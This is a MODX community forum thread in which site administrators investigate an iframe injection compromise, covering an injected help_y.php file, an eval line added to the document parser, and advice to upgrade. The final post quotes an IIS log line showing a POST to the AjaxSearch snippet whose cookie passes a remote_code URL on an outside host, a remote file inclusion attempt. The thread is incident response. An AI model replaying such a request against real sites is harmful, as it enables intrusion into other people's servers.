-
- 654 Posts
Can anyone confirm that they saw this iframe hack *without* the use of a script from dynamicdrive? I think I’ve got the URL and parameters that were injected, if anyone wants them.
Matt
As per the security warning in the Security thread, you really need to upgrade to the latest code release.
Ryan Thrash, MODX Co-Founder
Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
-
- 654 Posts
FWIW, the javascript that this was inserted into (as part of a document.write call) only existed as a chunk. I.e. it was not a file anywhere that was read in from disk.
MattC
-
- 654 Posts
The database shows no sign of this code (according to a text search of an SQL dump). The cleaning I did was related to deleting the help_y file and deleting the line added to the document parser code, as opposed to having to mess with any database records. As others noted, it seemed to be there for a bit, then was gone. FWIW, I’ve got a copy of the help_y.php file I found, but I can’t get it’s data gzuncompressed without an error. If anyone wants a copy of it, PM me with instructions ...
MattC
Rico
Genius is one percent inspiration and ninety-nine percent perspiration.
Thomas A. Edison
MODx is great, but knowing how to use it well makes it perfect!
www.virtudraft.com
Security, security, security! |
Indonesian MODx Forum |
MODx Revo's cheatsheets |
MODx Evo's cheatsheets
Author of
Easy 2 Gallery 1.4.x,
PHPTidy,
spieFeed,
FileDownload R,
Upload To Users CMP,
Inherit Template TV,
LexRating,
ExerPlan,
Lingua,
virtuNewsletter,
Grid Class Key,
SmartTag,
prevNext
Maintainter/contributor of
Babel
Because it's hard to follow all topics on the forum, PING ME ON TWITTER
@_goldsky if you need my help.
Hi,
I’ve had a couple of customers report this on our servers running Windows, from what I can see in both instances document.parser has the extra eval code, however what is strange is the file modified date / time does not seem to have changed, one site has a modified date of 02/01/2008.
It’s running 9.6.3 and another site is running 1.0.2.
I’m going to advise users to upgrade to the latest version, but it would be good to know what the root cause is of this exploit.
Thanks Aaron
Thanks to the backups we run, I have managed to find when the file was changed.
One customer site had the document.parser file backed up on the 17/07/2010 01:35am
So we checked the log files in IIS for 16/07/2010 and 17/07/2010 and found this
2010-07-16 07:10:05 W3SVC1178 VENUS 87.117.200.76 POST /assets/snippets/ajaxSearch/ajax.php - 80 - 212.62.110.20 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ru;+rv:1.8.0.12)+Gecko/20070508+Firefox/1.5.0.12 SN49bf4e0501677=9hmq9t0u4vkpost3vdasthfgt6,+;pird=1;pizd=1;osCcid=1,+;remote_code=http://remotedomainwithexploit.cn/sof/remote_code.txt http://www.domainname.com/assets/snippets/ajaxSearch/ajax.php www.domainname.com 200 0 0 4547 820 1640
It seems ajaxsearch is the way in.
Aaron